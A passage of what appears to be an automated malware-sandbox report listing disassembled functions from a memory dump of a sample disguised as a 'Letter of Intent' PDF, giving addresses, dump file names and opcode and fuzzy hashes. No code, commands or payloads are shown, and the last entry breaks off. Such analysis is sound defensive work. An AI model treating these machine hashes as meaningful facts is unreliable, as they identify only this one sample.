                                                                                      • Instruction Fuzzy Hash: 8121917D241B91CFE316DB29C8A0B61B3E4FB41B48F454896EE8287651DB39D8C2DB20
                                                                                      Function 32FBF32A Relevance: .1, Instructions: 79COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                                                                      • Instruction ID: 664096b3570aac95c181c71330ea12acac280a2a704e8ca8c9e3e92048cae0d1
                                                                                      • Opcode Fuzzy Hash: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                                                                      • Instruction Fuzzy Hash: AF21C272200300DFDB19CF56C440B56B7E9EF85364F15466DE606CB290EBB4E841CB94
                                                                                      Function 32FC9660 Relevance: .1, Instructions: 78COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1f563e229ed24d4471e089fd88080016d2221d8090c4690419a6c7528e8de920
                                                                                      • Instruction ID: 9e285491bdcd3653093d46ffb50964b0f9c8abfc817912cac72d1da4b59e22eb
                                                                                      • Opcode Fuzzy Hash: 1f563e229ed24d4471e089fd88080016d2221d8090c4690419a6c7528e8de920
                                                                                      • Instruction Fuzzy Hash: F12138312047AEDBF7256B25CC10B2A77E6AB40360F140F59EA564A5E0DB31E841DF52
                                                                                      Function 330371F9 Relevance: .1, Instructions: 74COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d385e7943294503daa3e8172c7c0ff9b1ccf6277e7ca9781c2751a2531aa0c24
                                                                                      • Instruction ID: 51e15e5e6b13e1baca9a1f93c6b6f81a4e67603672e62c60812331ca56a666d4
                                                                                      • Opcode Fuzzy Hash: d385e7943294503daa3e8172c7c0ff9b1ccf6277e7ca9781c2751a2531aa0c24
                                                                                      • Instruction Fuzzy Hash: 5E212531A097418BE311CF298940B0FB7E9AFC2B64F144DADF8E683140DB70E8458F91
                                                                                      Function 3300D0C0 Relevance: .1, Instructions: 73COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                                                                                      • Instruction ID: 670eabe95c19d9991649dd9970d327529d3d9f434cc668b9ba41f5ff7cb78787
                                                                                      • Opcode Fuzzy Hash: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                                                                                      • Instruction Fuzzy Hash: 3A21C272644704ABE3119F2CDC41B8BBBE5EF88760F04096AF958973A0DB70D8018BE9
                                                                                      Function 32F8FB4C Relevance: .1, Instructions: 72COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2c127abe4603a0a42779a20a6cf4765ca859a8c0cd1fe1c92a88c9a2ea8e3ac3
                                                                                      • Instruction ID: 5564fbd5faea2153667b638c3b8a6900cef03cac56e401fb23972c252cb28eb7
                                                                                      • Opcode Fuzzy Hash: 2c127abe4603a0a42779a20a6cf4765ca859a8c0cd1fe1c92a88c9a2ea8e3ac3
                                                                                      • Instruction Fuzzy Hash: 41210576900712DFD718CF64C490669F3F4FF44324F948AAAC9A597650EB70AA41CB90
                                                                                      Function 32F9BA30 Relevance: .1, Instructions: 71COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8074cdbc68b5288c7f1d0c318c443b61181f71f811655a83a0f60f19fc638a8b
                                                                                      • Instruction ID: 751ccae2ee098846342097120ec798af518588c6f6b8f0e110f96eef8c53be01
                                                                                      • Opcode Fuzzy Hash: 8074cdbc68b5288c7f1d0c318c443b61181f71f811655a83a0f60f19fc638a8b
                                                                                      • Instruction Fuzzy Hash: 17210136705781DBE716CB58C860B9573AAFB89B94F0409A5EE408B7A1EA76D800C751
                                                                                      Function 32F8B765 Relevance: .1, Instructions: 69COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f6d952abde822ecab52083c74f0eb280f3333d65a4f0f8f939988f1c52d6981c
                                                                                      • Instruction ID: dd7fa0bfdd90c89f68f4e347d82cc3a541fcd9b65c9d85dd00e759fb47ea380a
                                                                                      • Opcode Fuzzy Hash: f6d952abde822ecab52083c74f0eb280f3333d65a4f0f8f939988f1c52d6981c
                                                                                      • Instruction Fuzzy Hash: E7215572510A44EFC722DF68CA50F19B7F5FF08708F154968E2169A6A2CBB4A852CF44
                                                                                      Function 32FB15A9 Relevance: .1, Instructions: 69COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 29802a1ca24c6965babefc6623953e4fc32110ab479eab20bfca4cc576a297b9
                                                                                      • Instruction ID: 052fa271f732377849c2bf2a48b8137481a3dc298246d81b89b0c9b547473606
                                                                                      • Opcode Fuzzy Hash: 29802a1ca24c6965babefc6623953e4fc32110ab479eab20bfca4cc576a297b9
                                                                                      • Instruction Fuzzy Hash: A321F376700785EFE7029F96CA44B1277E9AF44B84F1909A1EE068B7A2EB75DC40C750
                                                                                      Function 32F87BCD Relevance: .1, Instructions: 69COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 43328a255aad0290ac22c805be68ed26d37e3c6a1fab167c74c0b78b52fc36da
                                                                                      • Instruction ID: d805f5b4457bbf23e21924a0550bde5a69330c2fd3bc771ab37eab998a69d846
                                                                                      • Opcode Fuzzy Hash: 43328a255aad0290ac22c805be68ed26d37e3c6a1fab167c74c0b78b52fc36da
                                                                                      • Instruction Fuzzy Hash: 93117B796023249BEB25DF68C850FAAFBF1FF16760F500C66EB4297240DA70C841C760
                                                                                      Function 3304D7B0 Relevance: .1, Instructions: 68COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c5acb5f3ba083c4099dfa29a6382a993b1cbc49009cdf177e412d1a340e2cc6a
                                                                                      • Instruction ID: 4759a121b70ab0939793b248f4f7071da1280aab7f54b16bad02a5ccb99d0412
                                                                                      • Opcode Fuzzy Hash: c5acb5f3ba083c4099dfa29a6382a993b1cbc49009cdf177e412d1a340e2cc6a
                                                                                      • Instruction Fuzzy Hash: 4011D376900624ABD7228F45DC40F7B7BB9EF81B60F4604A9FD248B262D720DE00CBE0
                                                                                      Function 32FB9A18 Relevance: .1, Instructions: 68COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8e0df73b55497ddfadbe26ba18f34ecf871e8180e658a7c35b004a84e1aee84d
                                                                                      • Instruction ID: 251e964257421865cdd670df13b0330a1578b67b5932a18dd5ec0a82634d0d0d
                                                                                      • Opcode Fuzzy Hash: 8e0df73b55497ddfadbe26ba18f34ecf871e8180e658a7c35b004a84e1aee84d
                                                                                      • Instruction Fuzzy Hash: 2521AF72501611EFDB01CF15C900A45BBBDFF42B55B65D5A9EA189F210D731DE42CF80
                                                                                      Function 32F93720 Relevance: .1, Instructions: 67COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 173fba5c8a756f8d1a751fa8f0ba2e1cb251ed07a1b08bbd7ccf143d24522469
                                                                                      • Instruction ID: fa55b37c4c7411fb78b50d1f8acf36380557f50a221b19855b7f463fd10b6913
                                                                                      • Opcode Fuzzy Hash: 173fba5c8a756f8d1a751fa8f0ba2e1cb251ed07a1b08bbd7ccf143d24522469
                                                                                      • Instruction Fuzzy Hash: 1A21F6B4A0420D8BF701CF69C0447EE77B4FB8831CF258818DA12672D0CFB99949C755
                                                                                      Function 3301D080 Relevance: .1, Instructions: 66COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 189321cde47bd0b7a08d130050cd077bb5107d89ad88b287edbc82e7179d4533
                                                                                      • Instruction ID: 2dcdf6b19c9fa59df5eaa48e35d26d9f7a5bbce3bf62a7bb51a00514b7f94f8d
                                                                                      • Opcode Fuzzy Hash: 189321cde47bd0b7a08d130050cd077bb5107d89ad88b287edbc82e7179d4533
                                                                                      • Instruction Fuzzy Hash: 31114875650244ABC3229B28CC60F2B77E9EF81BA4F2548A9FB184F691DA71DC51CB90
                                                                                      Function 3302D5B0 Relevance: .1, Instructions: 66COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 227256db81d375ecfc13626cb2ab5827bd77baaff17ec571dfb7d10958618551
                                                                                      • Instruction ID: d085978c65a86bbff4e16e4a2b33f32b537b827d28c604da06d0f4192cf7d7ec
                                                                                      • Opcode Fuzzy Hash: 227256db81d375ecfc13626cb2ab5827bd77baaff17ec571dfb7d10958618551
                                                                                      • Instruction Fuzzy Hash: B111DD32620710AFD711DB64CC50F8ABBE9EF84760F144859E569DB680E7B4FA41CBA4
                                                                                      Function 32F89240 Relevance: .1, Instructions: 64COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9d71a25170bc65430946b9c63ca251eae386806bceab19138d911fac6cbeeeec
                                                                                      • Instruction ID: c5d9ad51a4f8b087568f3b9f279dda7535967541534d03ed93a43887540fe509
                                                                                      • Opcode Fuzzy Hash: 9d71a25170bc65430946b9c63ca251eae386806bceab19138d911fac6cbeeeec
                                                                                      • Instruction Fuzzy Hash: 6511017F121249AAD325AF61C851B667BE8FF98B80F104465EA04AF350E638DD03CF65
                                                                                      Function 3302D660 Relevance: .1, Instructions: 63COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 84d8c099071c2c2e27e0d7cc270b2f1a9f3cfe9a568463a6261584609a9bdb37
                                                                                      • Instruction ID: 2a0ac1d0589c26b200a92516919e5742e14bab9d21262928f525cee0f26df0b5
                                                                                      • Opcode Fuzzy Hash: 84d8c099071c2c2e27e0d7cc270b2f1a9f3cfe9a568463a6261584609a9bdb37
                                                                                      • Instruction Fuzzy Hash: 9511E779600604AFEB01EF64C554B9ABFF9EF85354F144899D5BAD7300D670ED01CB50
                                                                                      Function 33037A11 Relevance: .1, Instructions: 62COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 15a1222407a1c5d19ccea61b3658b8fd00689bc460bb740ee7240f7503e290d1
                                                                                      • Instruction ID: 983de552fe2fea9557b32de7b123e0e2042c4991d9d1e6df96f566d279d60ea1
                                                                                      • Opcode Fuzzy Hash: 15a1222407a1c5d19ccea61b3658b8fd00689bc460bb740ee7240f7503e290d1
                                                                                      • Instruction Fuzzy Hash: D8214A75E01A09DFDB08CF98D850BEDB3B0FB89B31F208299E465A7680DB756941CF90
                                                                                      Function 32F8FAA4 Relevance: .1, Instructions: 61COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4870b528d7b25b4471f0b5810bc38dc9778e41db59f1a3cb7c06885f010ffa25
                                                                                      • Instruction ID: a7efef5dadf0a7e7258f858c5f107697eece95827526545bd1de0bb4ea1d3689
                                                                                      • Opcode Fuzzy Hash: 4870b528d7b25b4471f0b5810bc38dc9778e41db59f1a3cb7c06885f010ffa25
                                                                                      • Instruction Fuzzy Hash: 3A11B235A00305EFEB15CF50D810F5AF7FAEB85368F148999DA429B640EB71ED42CB90
                                                                                      Function 32FC5A01 Relevance: .1, Instructions: 59COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6ed659946fb9fc9b79206869a8043569f9835a961de5c7259737506ae61f8194
                                                                                      • Instruction ID: 3fe5000e589da740fb2119df80fcc6814276b725ae6e8e6be3d5b5a948f0d726
                                                                                      • Opcode Fuzzy Hash: 6ed659946fb9fc9b79206869a8043569f9835a961de5c7259737506ae61f8194
                                                                                      • Instruction Fuzzy Hash: B2110832641665BFD7224F06CD90F6B3B7AEF88B80F010828BB046B2A0CA71CC00DB90
                                                                                      Function 3300DA1D Relevance: .1, Instructions: 58COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 012a71606a4d59d9462653767c3d49fe1bd4ebf1bf8dc5cce1905e6e7a89c31f
                                                                                      • Instruction ID: 3571cca9c5500e08b1056e682ecf488c5b18c88d00c2c44cb6ac9f52ac09d55f
                                                                                      • Opcode Fuzzy Hash: 012a71606a4d59d9462653767c3d49fe1bd4ebf1bf8dc5cce1905e6e7a89c31f
                                                                                      • Instruction Fuzzy Hash: F7114832504208BFCB018F6CD8808BEB7B9EFD6344F108069F944D7350CA718D41C7A5
                                                                                      Function 32FBB052 Relevance: .1, Instructions: 57COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f9f3ee4dc4b0446fdcc1642ec50bfabae8af3bf94fd04ef1ee412c1fd6e153ed
                                                                                      • Instruction ID: 42776563daa3d1f35ec57a7fe836ae145be90650544089424b0f5ff5c647588b
                                                                                      • Opcode Fuzzy Hash: f9f3ee4dc4b0446fdcc1642ec50bfabae8af3bf94fd04ef1ee412c1fd6e153ed
                                                                                      • Instruction Fuzzy Hash: 2501D676B003047BDB109BABDC84F6B77E8EF84B54F040868EB05D7141DAB0E901C661
                                                                                      Function 3304D6F0 Relevance: .1, Instructions: 57COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ab5dca7662d95f66bb5cdf7901944074af6dd6205da9398680eb86638002d29b
